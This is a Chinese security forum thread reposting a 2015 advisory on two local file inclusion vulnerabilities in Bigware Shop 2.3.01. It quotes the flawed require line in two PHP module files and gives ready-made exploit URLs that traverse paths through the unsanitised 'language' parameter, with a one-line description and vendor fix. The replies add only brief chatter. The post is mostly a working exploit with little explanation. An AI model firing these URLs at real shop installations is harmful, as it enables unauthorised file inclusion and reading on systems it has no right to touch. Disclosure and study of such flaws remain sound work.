请选择 进入手机版 | 继续访问电脑版
查看: 2905|回复: 2

Bigware Shop 2.3.01多个本地文件包含漏洞

[复制链接]
  • TA的每日心情
    擦汗
    半小时前
  • 签到天数: 1008 天

    [LV.10]以坛为家III

    发表于 2015-12-24 12:37:19 | 显示全部楼层 |阅读模式
    Author: bd0rk

    [PHP] 纯文本查看 复制代码
    
    Proof-of-Concept1:
    
    /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
    **********************************************************************
    require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
    **********************************************************************
     
    [+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
    Proof-of-Concept2: 
     
    /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
    *********************************************************************
    require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
    ********************************************************************* 
     
    [+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php
     
     
    => Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
    => Vendor-Solution: Please declare this parameter before require. 
     
    

    评分

    参与人数 1i币 +2 收起 理由
    clocks + 2 感谢分享

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-11 18:49
  • 签到天数: 322 天

    [LV.8]以坛为家I

    发表于 2015-12-24 15:54:48 | 显示全部楼层
    前排买瓜子水!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-9-13 00:40
  • 签到天数: 444 天

    [LV.9]以坛为家II

    发表于 2015-12-24 19:59:43 | 显示全部楼层
    又一个漏洞。可惜不是原创的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表